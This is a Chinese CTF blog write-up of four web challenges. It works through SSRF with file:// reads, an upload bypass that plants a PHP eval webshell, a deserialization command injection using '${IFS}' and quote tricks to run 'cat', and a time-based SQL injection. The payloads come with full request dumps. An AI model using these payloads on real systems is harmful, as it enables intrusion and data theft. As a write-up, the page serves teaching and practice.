<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="骇极杯Web Writeup">
<meta property="og:url" content="http://0day.design/2018/11/07/骇极杯Web Writeup/index.html">
<meta property="og:site_name" content="Passer6y&#39;s Blog">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/4z1onhhv6pqzfyk97slz67cu/image_1crgs2r4oepqtd0mobg8m540m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/83281jibgwrz9d75yv7puk0k/image_1crgscmub1fk1elh1kjm2a7183822.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/sth57kuvdrf0r3gljhqtrko1/GQND%28%7D63%294FP0%28DRLZGY6JF.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/cpku3avo9x6vozd5qr2m4k2f/image_1crgsp60u133k7motrk52k1l7k1p.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/dg4u4414k3see92fcpjjbkdu/image_1crgsuoi9b201mb44si144a8or26.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/oujgnaygobr4gpxp34gv7atp/image_1crgsuufhjfs17nn1rclhhfgsf2j.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/a74p188jii0t48s8tfsxent4/image_1crgt3nbf1l5m1a7115t0mt4ohe30.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x6dg5lp0t4zvhap3cnr5w5hj/image_1crgt3svt1emu7ra1bnlcv9ule3d.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/93nex2326pfdkuodojqzyg9x/upload.html">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x2ljvm57ffcn03wkfbbhq28w/image_1crm340bpvfi15d819q31833s7s19.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/y8v1nx4robkju8dulum4yy7b/image_1crm35qnc10sc1lcjoe71rlhlr22m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/dnew3s0p4brzpxp5346d1euf/image_1crhijg1o78isca1kto1blqahb9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/02r8d73xr5serxwfjhnu3mi6/image_1crhk7625t337hc7nd813qcb26.png">
<meta property="og:updated_time" content="2019-02-10T09:34:04.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="骇极杯Web Writeup">
<meta name="twitter:image" content="http://static.zybuluo.com/Passer6y/4z1onhhv6pqzfyk97slz67cu/image_1crgs2r4oepqtd0mobg8m540m.png">



  <link rel="alternate" href="/atom.xml" title="Passer6y's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://0day.design/2018/11/07/骇极杯Web Writeup/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>骇极杯Web Writeup | Passer6y's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passer6y's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0day.design/2018/11/07/骇极杯Web Writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passer6y's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">骇极杯Web Writeup
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-11-07 11:40:00" itemprop="dateCreated datePublished" datetime="2018-11-07T11:40:00+08:00">2018-11-07</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-02-10 17:34:04" itemprop="dateModified" datetime="2019-02-10T17:34:04+08:00">2019-02-10</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/11/07/骇极杯Web Writeup/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2018/11/07/骇极杯Web Writeup/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<ol>
<li>web1<br>这题考察ssrf。<br>robots.txt中提示有两个文件：</li>
</ol>
<ul>
<li>source.php</li>
<li>flag.php<br>显然一个是源码一个是flag。<br><img src="http://static.zybuluo.com/Passer6y/4z1onhhv6pqzfyk97slz67cu/image_1crgs2r4oepqtd0mobg8m540m.png" alt="image_1crgs2r4oepqtd0mobg8m540m.png-89.5kB"></li>
</ul>
<p>这里还考察了一个点，php获取ip的绕过，这里x-client-ip即可绕过。<br>![@JMXBRS[UGCT}~}FG<a href="http://static.zybuluo.com/Passer6y/p3cip90469ehrwqlkl0716t4/@JMXBRS%5BUGCT%7D~%7DFG%5B2%60%7D2T.png" target="_blank" rel="noopener">2`}2T.png-69.6kB</a><br>常见的修改http请求头伪造ip的方法有：</p>
<ul>
<li>X_FORWARDED_FOR</li>
<li>Client-IP</li>
<li>x-client-ip</li>
</ul>
<p>然后让我们加上url参数请求i春秋的官网：<br><code>url=http://www.ichunqiu.com</code><br><img src="http://static.zybuluo.com/Passer6y/83281jibgwrz9d75yv7puk0k/image_1crgscmub1fk1elh1kjm2a7183822.png" alt="image_1crgscmub1fk1elh1kjm2a7183822.png-39.5kB"></p>
<p>而且每次请求都发现文件名在变，然后返回的东西里面还有<code>;</code>号，开始以为是考nginx的解析漏洞。后来一想不可能无缘无故给url参数，可能是指定url，然后把读取到的文件写到图片里面。<br>后来看到sn00py师傅测试<code>url=//www.ichunqiu.com</code>的时候发现，再去访问图片的响应码就变成200了。<br><img src="http://static.zybuluo.com/Passer6y/sth57kuvdrf0r3gljhqtrko1/GQND%28%7D63%294FP0%28DRLZGY6JF.png" alt="GQND(}63)4FP0(DRLZGY6JF.png-29.7kB"></p>
<p><img src="http://static.zybuluo.com/Passer6y/cpku3avo9x6vozd5qr2m4k2f/image_1crgsp60u133k7motrk52k1l7k1p.png" alt="image_1crgsp60u133k7motrk52k1l7k1p.png-59.3kB"></p>
<p>然后想到用file协议去绕url限制：<br><img src="http://static.zybuluo.com/Passer6y/dg4u4414k3see92fcpjjbkdu/image_1crgsuoi9b201mb44si144a8or26.png" alt="image_1crgsuoi9b201mb44si144a8or26.png-35.8kB"><br><img src="http://static.zybuluo.com/Passer6y/oujgnaygobr4gpxp34gv7atp/image_1crgsuufhjfs17nn1rclhhfgsf2j.png" alt="image_1crgsuufhjfs17nn1rclhhfgsf2j.png-60.4kB"></p>
<p>读flag<br><img src="http://static.zybuluo.com/Passer6y/a74p188jii0t48s8tfsxent4/image_1crgt3nbf1l5m1a7115t0mt4ohe30.png" alt="image_1crgt3nbf1l5m1a7115t0mt4ohe30.png-40.3kB"><br><img src="http://static.zybuluo.com/Passer6y/x6dg5lp0t4zvhap3cnr5w5hj/image_1crgt3svt1emu7ra1bnlcv9ule3d.png" alt="image_1crgt3svt1emu7ra1bnlcv9ule3d.png-73.3kB"></p>
<ol start="2">
<li>web2<br>题目源码：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">   //error_reporting(0);</span><br><span class="line">   //$dir=md5(&quot;icq&quot; . $_SERVER[&apos;REMOTE_ADDR&apos;]);</span><br><span class="line">   //$dir=md5(&quot;icq&quot;);</span><br><span class="line">   //$sandbox = &apos;/var/sandbox/&apos; . $dir;</span><br><span class="line">   //@mkdir($sandbox);</span><br><span class="line">   //@chdir($sandbox);</span><br><span class="line"></span><br><span class="line">   if($_FILES[&apos;file&apos;][&apos;name&apos;])&#123;</span><br><span class="line">       $filename = !empty($_POST[&apos;file&apos;]) ? $_POST[&apos;file&apos;] : $_FILES[&apos;file&apos;][&apos;name&apos;];</span><br><span class="line">       if (!is_array($filename)) &#123;</span><br><span class="line">           $filename = explode(&apos;.&apos;, $filename);</span><br><span class="line">       &#125;</span><br><span class="line">       $ext = end($filename);</span><br><span class="line">       if($ext==$filename[count($filename) - 1])&#123;</span><br><span class="line">           die(&quot;emmmm...&quot;);</span><br><span class="line">       &#125;</span><br><span class="line">       $new_name = (string)rand(100,999).&quot;.&quot;.$ext;</span><br><span class="line">       move_uploaded_file($_FILES[&apos;file&apos;][&apos;tmp_name&apos;],$new_name);</span><br><span class="line">       $_ = $_POST[&apos;hehe&apos;];</span><br><span class="line">       if(@substr(file($_)[0],0,6)===&apos;@&lt;?php&apos; &amp;&amp; strpos($_,$new_name)===false)&#123;</span><br><span class="line">           include($_);</span><br><span class="line">       &#125;</span><br><span class="line">       unlink($new_name);</span><br><span class="line">   &#125;</span><br><span class="line">   else&#123;</span><br><span class="line">       highlight_file(__FILE__);</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>上传页，抓包用：<br><img src="http://static.zybuluo.com/Passer6y/93nex2326pfdkuodojqzyg9x/upload.html" alt="upload.html-0.3kB"></p>
<p>正常解法,先绕<code>end()</code>和<code>$filename[count($filename) - 1]</code>的差异，然后end是取最后一个插入的元素，后者是取索引中的最后一个，然后我们上传的时候给file变量传数组就不会进入explode截断，这样就可以绕过：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if($ext==$filename[count($filename) - 1])&#123;</span><br><span class="line">    die(&quot;emmmm...&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>接着后面是给文件名重命令三位随机数，并且hehe参数不能包含这个随机重命名的上传文件。<br>这里参考</p>
<blockquote>
<p><a href="http://pupiles.com/%E7%94%B1%E4%B8%80%E9%81%93ctf%E9%A2%98%E5%BC%95%E5%8F%91%E7%9A%84%E6%80%9D%E8%80%83.html" target="_blank" rel="noopener">http://pupiles.com/%E7%94%B1%E4%B8%80%E9%81%93ctf%E9%A2%98%E5%BC%95%E5%8F%91%E7%9A%84%E6%80%9D%E8%80%83.html</a></p>
</blockquote>
<p>接着可以使用<code>x/../1.php/.</code>进行文件覆盖<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">POST /file_upload/shanghai/1.php HTTP/1.1</span><br><span class="line">Host: ctf</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------20782431812432</span><br><span class="line">Content-Length: 717</span><br><span class="line">Referer: http://ctf/file_upload/shanghai/upload.html</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">-----------------------------20782431812432</span><br><span class="line">Content-Disposition: form-data; name=&quot;file[1]&quot;</span><br><span class="line"></span><br><span class="line">jpg</span><br><span class="line">-----------------------------20782431812432</span><br><span class="line">Content-Disposition: form-data; name=&quot;file[0]&quot;</span><br><span class="line"></span><br><span class="line">x/../1.php/.</span><br><span class="line">-----------------------------20782431812432</span><br><span class="line">Content-Disposition: form-data; name=&quot;hehe&quot;</span><br><span class="line"></span><br><span class="line">1.php</span><br><span class="line">-----------------------------20782431812432</span><br><span class="line">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.php&quot;</span><br><span class="line">Content-Type: application/octet-stream</span><br><span class="line"></span><br><span class="line">@&lt;?php $file = &apos;1ndex.php&apos;;$code = &apos;&lt;?php eval($_POST[\&apos;passer6y\&apos;]);?&gt;&apos;;file_put_contents($file,$code);?&gt;</span><br><span class="line">-----------------------------20782431812432</span><br><span class="line">Content-Disposition: form-data; name=&quot;submit&quot;</span><br><span class="line"></span><br><span class="line">submit</span><br><span class="line">-----------------------------20782431812432--</span><br></pre></td></tr></table></figure></p>
<p>这样就可以拿到shell了。</p>
<p>sn00py师傅最初的非预期解法，就是因为想到，hehe变量不能包含自己传上去的文件，所以开多个爆破程序，让A程序和B程序相互产生的随机数相互碰撞，直到包含成功。</p>
<ol start="3">
<li>web3<br>题目：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    error_reporting(E_ALL);</span><br><span class="line">    class come&#123;    </span><br><span class="line">        private $method;</span><br><span class="line">        private $args;</span><br><span class="line">        function __construct($method, $args) &#123;</span><br><span class="line">            $this-&gt;method = $method;</span><br><span class="line">            $this-&gt;args = $args;</span><br><span class="line">        &#125;</span><br><span class="line">        function __wakeup()&#123;</span><br><span class="line">            foreach($this-&gt;args as $k =&gt; $v) &#123;</span><br><span class="line">                $this-&gt;args[$k] = $this-&gt;waf(trim($v));</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        function waf($str)&#123;</span><br><span class="line">            $str=preg_replace(&quot;/[&lt;&gt;*;|?\n ]/&quot;,&quot;&quot;,$str);</span><br><span class="line">            $str=str_replace(&apos;flag&apos;,&apos;&apos;,$str);</span><br><span class="line">            return $str;</span><br><span class="line">        &#125;           </span><br><span class="line">        function echo($host)&#123;      </span><br><span class="line">            system(&quot;echo $host&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        function __destruct()&#123;</span><br><span class="line">            if (in_array($this-&gt;method, array(&quot;echo&quot;))) &#123;</span><br><span class="line">                call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; </span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $first=&apos;hi&apos;;</span><br><span class="line">    $var=&apos;var&apos;;</span><br><span class="line">    $bbb=&apos;bbb&apos;;</span><br><span class="line">    $ccc=&apos;ccc&apos;;</span><br><span class="line">    $i=1;</span><br><span class="line">    foreach($_GET as $key =&gt; $value) &#123;</span><br><span class="line">            if($i===1)</span><br><span class="line">            &#123;</span><br><span class="line">                $i++;   </span><br><span class="line">                $$key = $value;</span><br><span class="line">            &#125;</span><br><span class="line">            else&#123;break;&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    if($first===&quot;doller&quot;)</span><br><span class="line">    &#123;</span><br><span class="line">        @parse_str($_GET[&apos;a&apos;]);     // 注册变量</span><br><span class="line">        </span><br><span class="line">        if($var===&quot;give&quot;)</span><br><span class="line">        &#123;</span><br><span class="line">            if($bbb===&quot;me&quot;)</span><br><span class="line">            &#123;</span><br><span class="line">                if($ccc===&quot;flag&quot;)</span><br><span class="line">                &#123;</span><br><span class="line">                    echo &quot;&lt;br&gt;welcome!&lt;br&gt;&quot;;</span><br><span class="line">                    $come=@$_POST[&apos;come&apos;];</span><br><span class="line">                    unserialize($come); </span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            else</span><br><span class="line">            &#123;echo &quot;&lt;br&gt;think about it&lt;br&gt;&quot;;&#125;</span><br><span class="line">        &#125;</span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line">            echo &quot;NO&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">    else</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;Can you hack me?&lt;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>这题先考察变量覆盖，再考察反序列化漏洞。<br>37行处$i变量覆盖一直想多循环几次多覆盖几个变量，结果发现传入的i=1的类型是字符型，而if判断的是<code>===</code>。<br>所以这里就只能先覆盖$first变量进入，<strong>parse_str部分</strong>,这里可以继续覆盖变量，<a href="http://php.net/manual/zh/function.parse-str.php" target="_blank" rel="noopener">文档</a>,所以可以构造payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?first=doller&amp;a%3dvar%3dgive%26bbb%3dme%26ccc%3dflag</span><br><span class="line">// 解码后：?first=doller&amp;a=var=give&amp;bbb=me&amp;ccc=flag</span><br></pre></td></tr></table></figure></p>
<p>下面就考察反序列化的东西了，构造函数传入参数，析构函数回调echo函数。需要绕过waf函数。<br>&amp;拼接命令，${IFS}绕过空格，fl””ag绕过flag的限制。</p>
<p><img src="http://static.zybuluo.com/Passer6y/x2ljvm57ffcn03wkfbbhq28w/image_1crm340bpvfi15d819q31833s7s19.png" alt="image_1crm340bpvfi15d819q31833s7s19.png-9.9kB"></p>
<p>payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(E_ALL);</span><br><span class="line">class come&#123;    </span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    function __construct($method, $args) &#123;</span><br><span class="line">        $this-&gt;method = $method;</span><br><span class="line">        $this-&gt;args = $args;</span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        foreach($this-&gt;args as $k =&gt; $v) &#123;</span><br><span class="line">            $this-&gt;args[$k] = $this-&gt;waf(trim($v));             // 注册变量，过滤值</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    function waf($str)&#123;</span><br><span class="line">        $str=preg_replace(&quot;/[&lt;&gt;*;|?\n ]/&quot;,&quot;&quot;,$str);</span><br><span class="line">        $str=str_replace(&apos;flag&apos;,&apos;&apos;,$str);</span><br><span class="line">        return $str;</span><br><span class="line">    &#125;           </span><br><span class="line">    function echo($host)&#123;</span><br><span class="line">        echo &quot;\n&quot;;      </span><br><span class="line">        system(&quot;echo $host&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        if (in_array($this-&gt;method, array(&quot;echo&quot;))) &#123;</span><br><span class="line">            call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; </span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$args = array(&apos;1&amp;cat$&#123;IFS&#125;fl&quot;&quot;ag&apos;);</span><br><span class="line">$aa = new come(&quot;echo&quot;,$args);</span><br><span class="line">echo urlencode(serialize($aa));</span><br></pre></td></tr></table></figure></p>
<p>本地测试：<br><img src="http://static.zybuluo.com/Passer6y/y8v1nx4robkju8dulum4yy7b/image_1crm35qnc10sc1lcjoe71rlhlr22m.png" alt="image_1crm35qnc10sc1lcjoe71rlhlr22m.png-73.6kB"></p>
<ol start="4">
<li>web4<br>一个后台登录页，还有一个注入点。</li>
</ol>
<p>if sleep # 没被过滤<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;+and+if((SELECT+VERSION())&gt;1,sleep(3),0)%23</span><br></pre></td></tr></table></figure></p>
